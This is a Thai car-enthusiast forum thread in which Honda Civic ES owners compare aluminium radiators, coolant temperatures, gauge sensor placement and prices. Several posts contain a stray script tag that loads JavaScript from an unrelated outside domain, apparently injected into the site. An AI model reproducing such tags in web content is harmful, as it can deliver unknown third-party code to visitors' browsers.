ตอบ
Jacksu


เข้าร่วม: 13 มกรา 2009
ตอบ: 425

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 498
ให้คำขอบคุณ: 87

ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 26 สิงหา 2013 21:44 - หม้อน้ำ อลูมิเนียม 2 ชั้น
ต้องระวังเรื่องท่อ oil เกียร์ด้วยนะครับ...
ได้รับคำขอบคุณจาก: Saka 
biwsa666


ชื่อเล่น: บิว

เข้าร่วม: 29 กรกฎา 2013
ตอบ: 27

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 11
ให้คำขอบคุณ: 0

ที่อยู่: หลักสี่ กทม.
ปี: 2004
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 27 สิงหา 2013 01:28 - หม้อน้ำ อลูมิเนียม 2 ชั้น
Saka พิมพ์ว่า:
jaksawatza พิมพ์ว่า:
ความร้อนถ้าเทียบกับหม้อน้ำเดิมๆแท้ศูนย์เป็นยังไงบ้างครับ

ของผมติดเกจวัดความร้อนดิจิตอลแยก รถติดๆอยู่ที่ 78-84 ส่วนรถวิ่งอยู่ 59-64 อะครับ
 


หม้อน้ำทำหน้าที่ระบายความร้อน มันไม่ไ้ด้ทำให้เย็นขึ้นนะครับในความคิดผม แต่มันช่วยระบายความร้อนได้เร็วขึ้นแค่นั้นครับ อย่างรถติด ๆ พัดลมทำงานแต่ละทีอุณหภูมิลงเห็นเลย และในขณะรถวิ่งลมตีช่วยระบายความร้อนได้ดีพัดลมหม้อน้ำแทบจะไม่ต้องทำงาน(ถ้าไม่เปิดแอร์)

รถคุณติดเซ็นเซอร์ไว้ตรงไหนครับ
ของผมใส่เกจก๊อบไม่รู้ตรงหรือป่าว หม้อน้ำเดิมรถติด 92-94 ตอนนี้ 86-88 เที่ยง ๆ ก็อยู่ 90 ถือว่าเย็นกว่าเดิมหน่อย
ส่วนรถวิ่งหม้อน้ำเดิม 80 ตอนนี้ไม่ถึง 70 ครับ เมื่อวันเสาร์ขับตอน 5-6 โมงเย็น แช่ 140+ ยาว ๆ ความร้อน 50 + เองครับ




สวดยอด ต้องจัดบ้าง
ได้รับคำขอบคุณจาก: Saka 
horus


ชื่อเล่น: ต๋อย

เข้าร่วม: 18 เมษา 2013
ตอบ: 1272

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1777
ให้คำขอบคุณ: 1065

ที่อยู่: รามอินทรา / นนทบุรี / ES เมืองทอง
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
อังคาร, 27 สิงหา 2013 09:31 - หม้อน้ำ อลูมิเนียม 2 ชั้น
ES2.0 พิมพ์ว่า:
ผมชอบคุณสมบัติมันนะ คายความร้อนเร็วดี แต่ถ้ามันรั่วทีนี่หาร้านทำยากอ่ะ
มันใช้ลวดเชื่อมแบบหม้อน้ำทองแดงไม่ได้นี่สิติดตรงนี้แหละ..


มีเหตุผล ถ้าร้านทั่วไปทำได่ป่าวเอ่ย "<script src="https://sport32news.com/civicesgroup.js">
 
ได้รับคำขอบคุณจาก: Saka 
chokpiti


ชื่อเล่น: โชค

เข้าร่วม: 17 ธันวา 2013
ตอบ: 1156

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1455
ให้คำขอบคุณ: 1837

ที่อยู่: มหาชัย-ระยอง
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 27 สิงหา 2013 10:12 - หม้อน้ำ อลูมิเนียม 2 ชั้น
ส่วนตัว แนะนำให้ใช้ของศูนย์HONDAดีกว่าครับ พอดีเคยทำงานอยู่บริษัทที่ผลิต CONDENSORมาก่อน ของศุนย์เค้าทดสอบโดยใช้ก๊าซHeliumมันสามารถตรวจสอบการรั่วได้ดีกว่าใช้น้ำหรือลมทดสอบครับ ใช้ของทีอื่นๆคุณภาพอาจจะไม่ดีครับ ของผมรถ10ปีแล้ววิ่งมา285,000km ยังไม่เคยเปลี่ยนเลย
"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: Saka  qq 
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
อังคาร, 27 สิงหา 2013 12:27 - หม้อน้ำ อลูมิเนียม 2 ชั้น
chokpiti พิมพ์ว่า:
ส่วนตัว แนะนำให้ใช้ของศูนย์HONDAดีกว่าครับ พอดีเคยทำงานอยู่บริษัทที่ผลิต CONDENSORมาก่อน ของศุนย์เค้าทดสอบโดยใช้ก๊าซHeliumมันสามารถตรวจสอบการรั่วได้ดีกว่าใช้น้ำหรือลมทดสอบครับ ใช้ของทีอื่นๆคุณภาพอาจจะไม่ดีครับ ของผมรถ10ปีแล้ววิ่งมา285,000km ยังไม่เคยเปลี่ยนเลย
"<script src="https://sport32news.com/civicesgroup.js">

 
 
หม้อน้ำใบเดิมติดรถผมเปลี่ยนตอน 2 แสนกว่าโลนี่แหละครับ ไม่รั่ว ไม่ซึม ไม่มีอาการอะไรเลย มีเพียงฝาพลาสติกสีมันซีด ๆ ผมกลัวว่ามันจะแตกกลางทาง เลยตัดสินใจถอดเปลี่ยนใบใหม่ ระหว่างถอดท่อยางตัวล่างออกจากหม้อน้ำ คอท่อก็ขาดติดมือออกมาเลย(ทำที่อู่เพื่อน นั่งไขเอง)โชคดีที่เปลี่ยนก่อนไม่งั้นวิ่ง ๆ ไปแล้วมันแตกขึ้นมาน้ำออกทีเดียวหมดได้พังแน่ ๆ
ส่วนก๊าช Helium นี่ใช่ที่ช่างแอร์ใช้เช็ครั่วป่าว ที่เป็นสารเรืองแสงอะครับ ถ้าใช่เดี๋ยวถอดหม้อน้ำรอบต่อไปลองเอามาเล่นบ้าง พอดีมีของอยู่ตอนเช็ครั่วแอร์รถบัส
 
ได้รับคำขอบคุณจาก: qq 
สมพงศ์หง้าฝา


ชื่อเล่น: พงศ์

เข้าร่วม: 03 สิงหา 2013
ตอบ: 209

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 72
ให้คำขอบคุณ: 0

ที่อยู่: 127 ม.6 ต.ไสไทย อ.เมือง จ.กระบี่(อบต.ไสไทย)
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 27 สิงหา 2013 13:04 - หม้อน้ำ อลูมิเนียม 2 ชั้น
เสียดายของผมพึ่งจะเปลี่ยนไปไม่นานเองไม่รู้จะอยู่ได้นานหรือเปล่า
ได้รับคำขอบคุณจาก: Saka 
jaroenp


ชื่อเล่น: ป๋อ

เข้าร่วม: 29 ธันวา 2010
ตอบ: 376

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 272
ให้คำขอบคุณ: 39

ที่อยู่: BangNa
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 27 สิงหา 2013 13:11 - หม้อน้ำ อลูมิเนียม 2 ชั้น
Saka พิมพ์ว่า:
รถผม ES 01 อายุก็หลายปีแล้ว ก่อนหน้านี้เคยเปลี่ยนหม้อน้ำมาแล้ว 1 ครั้ง เมื่อ 2-3 ปีที่แล้ว ตอนนั้นใช้หม้อน้ำเหมือนเดิมคือรังผึ้งอลูมิเนียม ฝาพลาสติก (ไม่ได้เบิกศูนย์) ใช้ได้ 2-3 ปี อาการรั่วก็มาเยือนที่ตะเข็บล่าง มันดันมาตอนกลางเดือนตั้งใจว่าสิ้นเดือนค่อยเปลี่ยนขยันเช็คน้ำเอา แต่ก็ไม่ทัน รั่วเยอะขึ้นเรื่อย ๆ จนความร้อนมาเยือนเลยต้องไปเปลี่ยนทันที
รอบนี้เลือกใช้ หม้อน้ำ อลูมิเนียม 2 ชั้น ฝาบน-ล่างก็เป็นอลูมิเนียมอัดขึ้นรูป ดูจากเนื้องานแล้วงานนี้ใช้อีกนาน
หลังจากใช้งานรู้สึกได้เลยว่าเครื่องเย็นขึ้นในขณะรถวิ่ง (รถผมติดเกจวัดความร้อน) เลยเอามาแนะนำเพื่อน ๆ เผื่อใครสนใจครับ ส่วนราคาแพงกว่าเบิกศูนย์หน่อยเดียวครับ

+1
ใช้อยู่ อัตราเร่งดีขึ้น รอบมากระชับ
เครื่องนิ่งขึ้น เพราะระบายความร้อนได้ดีทีเดียวครับ
และน้ำไม่เคยพร่องเลย
ส่วนราคา ผมถอยมา 7,xxx บ. ครับ
(เทหมดหน้าตักเลย ตอนนั้นน่ะ แบบว่าโมโหหม้อเก่ามันรั่ว ซึม ตลอด)


 
ได้รับคำขอบคุณจาก: Saka 
army-mafia46


เข้าร่วม: 04 ตุลา 2011
ตอบ: 953

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 818
ให้คำขอบคุณ: 1088

ที่อยู่: ดอนเมือง,อ่างทอง
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
พฤหัส, 29 สิงหา 2013 00:02 - หม้อน้ำ อลูมิเนียม 2 ชั้น
ถ้าของเดิมลาโลกผมคงต้องจัดมั้งครับ
ได้รับคำขอบคุณจาก: Saka 
Thanwa


ชื่อเล่น: แจ๊ค

เข้าร่วม: 01 ธันวา 2010
ตอบ: 890

Guru ES
Guru ES

ได้รับคำขอบคุณ: 293
ให้คำขอบคุณ: 729

ที่อยู่: พิษณุโลก
ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 29 สิงหา 2013 10:38 - หม้อน้ำ อลูมิเนียม 2 ชั้น
แหล่มเลย  
alit


ชื่อเล่น: เอ

เข้าร่วม: 25 กันยา 2009
ตอบ: 659

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1446
ให้คำขอบคุณ: 1266

ที่อยู่: สุขุมวิท BTS อ่อนนุช
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 17 ตุลา 2014 09:21 - หม้อน้ำ อลูมิเนียม 2 ชั้น
Saka พิมพ์ว่า:

jaksawatza พิมพ์ว่า:
ความร้อนถ้าเทียบกับหม้อน้ำเดิมๆแท้ศูนย์เป็นยังไงบ้างครับ

ของผมติดเกจวัดความร้อนดิจิตอลแยก รถติดๆอยู่ที่ 78-84 ส่วนรถวิ่งอยู่ 59-64 อะครับ

 


หม้อน้ำทำหน้าที่ระบายความร้อน มันไม่ไ้ด้ทำให้เย็นขึ้นนะครับในความคิดผม แต่มันช่วยระบายความร้อนได้เร็วขึ้นแค่นั้นครับ อย่างรถติด ๆ พัดลมทำงานแต่ละทีอุณหภูมิลงเห็นเลย และในขณะรถวิ่งลมตีช่วยระบายความร้อนได้ดีพัดลมหม้อน้ำแทบจะไม่ต้องทำงาน(ถ้าไม่เปิดแอร์)

รถคุณติดเซ็นเซอร์ไว้ตรงไหนครับ
ของผมใส่เกจก๊อบไม่รู้ตรงหรือป่าว หม้อน้ำเดิมรถติด 92-94 ตอนนี้ 86-88 เที่ยง ๆ ก็อยู่ 90 ถือว่าเย็นกว่าเดิมหน่อย
ส่วนรถวิ่งหม้อน้ำเดิม 80 ตอนนี้ไม่ถึง 70 ครับ เมื่อวันเสาร์ขับตอน 5-6 โมงเย็น แช่ 140+ ยาว ๆ ความร้อน 50 + เองครับ


อุณหภูมิตอนวิ่งน้อยกันจัง ติดเซ็นเซอร์ผิดที่หรือเปล่าครับ ถ้าท่อเส้นล่างเป็นน้ำที่ระบายความร้อนแล้วก่อนเข้าเครื่อง ท่อเส้นบนเป็นน้ำที่ออกมาจากเครื่อง สมมุตินะถ้าหม้อน้ำตันน้ำไม่วนวิ่งให้ตายความร้อนก็ไม่ขึ้นทั้งทั้งที่เครื่องจะฮีทแล้ว ผมว่าท่อเส้นบนดีกว่าครับ ความตั้งใจเราคืออุณหภูมิเครื่องเครื่องร้อนมากน่้อยเราได้รู้ ปลอดภัยกว่าครับ ใช่หรือเปล่านะรอผู้อีกที
ได้รับคำขอบคุณจาก: qq 
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
ศุกร์, 17 ตุลา 2014 12:00 - หม้อน้ำ อลูมิเนียม 2 ชั้น
alit พิมพ์ว่า:

Saka พิมพ์ว่า:

jaksawatza พิมพ์ว่า:
ความร้อนถ้าเทียบกับหม้อน้ำเดิมๆแท้ศูนย์เป็นยังไงบ้างครับ

ของผมติดเกจวัดความร้อนดิจิตอลแยก รถติดๆอยู่ที่ 78-84 ส่วนรถวิ่งอยู่ 59-64 อะครับ


 


หม้อน้ำทำหน้าที่ระบายความร้อน มันไม่ไ้ด้ทำให้เย็นขึ้นนะครับในความคิดผม แต่มันช่วยระบายความร้อนได้เร็วขึ้นแค่นั้นครับ อย่างรถติด ๆ พัดลมทำงานแต่ละทีอุณหภูมิลงเห็นเลย และในขณะรถวิ่งลมตีช่วยระบายความร้อนได้ดีพัดลมหม้อน้ำแทบจะไม่ต้องทำงาน(ถ้าไม่เปิดแอร์)

รถคุณติดเซ็นเซอร์ไว้ตรงไหนครับ
ของผมใส่เกจก๊อบไม่รู้ตรงหรือป่าว หม้อน้ำเดิมรถติด 92-94 ตอนนี้ 86-88 เที่ยง ๆ ก็อยู่ 90 ถือว่าเย็นกว่าเดิมหน่อย
ส่วนรถวิ่งหม้อน้ำเดิม 80 ตอนนี้ไม่ถึง 70 ครับ เมื่อวันเสาร์ขับตอน 5-6 โมงเย็น แช่ 140+ ยาว ๆ ความร้อน 50 + เองครับ


อุณหภูมิตอนวิ่งน้อยกันจัง ติดเซ็นเซอร์ผิดที่หรือเปล่าครับ ถ้าท่อเส้นล่างเป็นน้ำที่ระบายความร้อนแล้วก่อนเข้าเครื่อง ท่อเส้นบนเป็นน้ำที่ออกมาจากเครื่อง สมมุตินะถ้าหม้อน้ำตันน้ำไม่วนวิ่งให้ตายความร้อนก็ไม่ขึ้นทั้งทั้งที่เครื่องจะฮีทแล้ว ผมว่าท่อเส้นบนดีกว่าครับ ความตั้งใจเราคืออุณหภูมิเครื่องเครื่องร้อนมากน่้อยเราได้รู้ ปลอดภัยกว่าครับ ใช่หรือเปล่านะรอผู้อีกที

ติดท่อเส้นบนครับ เกจก๊อบอาจจะวัดได้ไม่ตรงมาก แต่ก็พอช่วยเตือนได้เวลามันร้อนผิดปกติ
 


Attached File :
หม้อน้ำ อลูมิเนียม 2 ชั้น
jewone


ชื่อเล่น: เล็ก

เข้าร่วม: 06 มิถุนา 2010
ตอบ: 22

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 7
ให้คำขอบคุณ: 1

ที่อยู่: ศรีราชา ชลบุรี
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 4 ธันวา 2014 08:28 - หม้อน้ำ อลูมิเนียม 2 ชั้น

พี่ได้ใช้มา เป็นปีแล้ว ผลยังดีเหมือนเดิมมั้ยครับ

ผมสนใจทำ ใช้กับเครื่อง K20A เกียร์ Auto สารถมาติดต่อได้ที่ไหนครับ
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
พฤหัส, 4 ธันวา 2014 10:40 - หม้อน้ำ อลูมิเนียม 2 ชั้น
ยังเหมือนเดิมครับ ไม่รั่วไม่ซึม ไม่ร้อน
แต่ความร้อนตอนรถวิ่งขึ้นมานิดนึง อยู่ประมาณ 72-74 องศา รู้สึกว่าเพิ่มขึ้นมาตั้งแต่ใส่กันชนหน้าไฮบริด คงเป็นเพราะทรงของกันชนมันมีช่องให้ลมเข้าน้อยกว่ากระจัง RS มั้งครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
mylovees2005


เข้าร่วม: 05 พฤศจิกา 2014
ตอบ: 111

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 123
ให้คำขอบคุณ: 142

ที่อยู่: นครปฐม กาญจนบุรี ปทุมธานี
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 4 ธันวา 2014 10:49 - หม้อน้ำ อลูมิเนียม 2 ชั้น
สวยมากเลยครับ
หม้อน้ำอลูมิเนียม หนึ่งในของแต่งเมพๆ ที่ต้องหามาครอบครอง
sophan.voratus


ชื่อเล่น: เม้ง

เข้าร่วม: 18 พฤศจิกา 2014
ตอบ: 73

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 61
ให้คำขอบคุณ: 97

ที่อยู่: เชียงใหม่
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 4 ธันวา 2014 11:25 - หม้อน้ำ อลูมิเนียม 2 ชั้น
ชอบอีตรงที่สวยนี่แหล่ะ
alit


ชื่อเล่น: เอ

เข้าร่วม: 25 กันยา 2009
ตอบ: 659

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1446
ให้คำขอบคุณ: 1266

ที่อยู่: สุขุมวิท BTS อ่อนนุช
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 4 ธันวา 2014 16:13 - หม้อน้ำ อลูมิเนียม 2 ชั้น
ผมก็ยังงงกับความร้อนหม้อน้ำของเพื่อนๆเพราะวาล์วน้ำ es เปิดที่ 84 ทำไมเพื่อนๆต่ำกว่า 84 กันหรือไม่ใส่วาล์วน้ำกันหรือเปล่าเพราะถ้ามีวาล์วน้ำยังไงอุณหภูมิใช้งานไม่น่าต่ำกว่า 84 นะครับรอผู้รู้มาชี้แจงอีกที
Prajuab


เข้าร่วม: 14 กรกฎา 2013
ตอบ: 357

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 209
ให้คำขอบคุณ: 3

ที่อยู่: กิ่งแก้ว สมุทรปราการ
ปี: 2003
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พฤหัส, 4 ธันวา 2014 17:00 - หม้อน้ำ อลูมิเนียม 2 ชั้น
เพิ่งเปลี่ยนมามา เมื่อปลายเดือนที่แล้ว วิ่งมา 180000 km. หม้อมีเนียม ฝาบนรั่ว  เลยจัด ทองแดง 2 ชั้น ฝาทองเหลือง 4500 บาท
ความร้อนคงเดิม แอร์เย็นน้อยกว่าเดิม นิดหนึ่ง exi mt
jaroenp


ชื่อเล่น: ป๋อ

เข้าร่วม: 29 ธันวา 2010
ตอบ: 376

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 272
ให้คำขอบคุณ: 39

ที่อยู่: BangNa
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 8 มกรา 2015 12:57 - หม้อน้ำ อลูมิเนียม 2 ชั้น
Saka พิมพ์ว่า:
wut-chiangmai พิมพ์ว่า:
โอ้วมาได้จังหวะเลยครับ ตอนนี้หม้อน้ำผมซึมข้างบน น้ำหายไปเรื่อย ๆ เลย

ขอราคากับที่ซื้อหน่อยสิครับพี่ 

ผมให้อู่เพื่อนสั่งให้ครับ ไม่รู้ว่าสั่งจากที่ไหน สั่งทำ สั่งเช้าบ่ายได้
ราคา 6,500 ติดตั้งเองครับ (ให้เพื่อนมันทำให้แหละ ผมแค่ยืนดู)




ราคานี้ไม่แพงเลยครับ 
ของผมสั่งมา 7,xxx ฿ ไม่รวมใส่ (3 ปีฝ่านไป) ใช้ดีมากๆ ขอบอกกกก
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
พฤหัส, 8 มกรา 2015 13:50 - หม้อน้ำ อลูมิเนียม 2 ชั้น
alit พิมพ์ว่า:
ผมก็ยังงงกับความร้อนหม้อน้ำของเพื่อนๆเพราะวาล์วน้ำ es เปิดที่ 84 ทำไมเพื่อนๆต่ำกว่า 84 กันหรือไม่ใส่วาล์วน้ำกันหรือเปล่าเพราะถ้ามีวาล์วน้ำยังไงอุณหภูมิใช้งานไม่น่าต่ำกว่า 84 นะครับรอผู้รู้มาชี้แจงอีกที

ไม่ถอด ไม่เจาะ ของแท้เบิกศูนย์เปลี่ยนเองกับมือครับ
แต่ทำไมมันต่ำกว่า 84 ก็ตอบไม่ได้ รถติด ๆ หรือติดไฟแดงนาน ๆ ก็อยู่ประมาณ 90-92 พอวิ่งทางโล่ง ๆ แป๊บเดียวก็เหลือ 72-74
ส่งรูปมาให้ดู รูปนี้คงข้าง ๆ ถ่ายให้ แช่ยาว ๆ มาประมาณนี้ (แต่จะเร็วกว่านี้ซะเป็นส่วนใหญ่) ถ่ายช่วงต้นเดือนธันวา


Attached File :
หม้อน้ำ อลูมิเนียม 2 ชั้น
ตอบ
หน้า 2 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.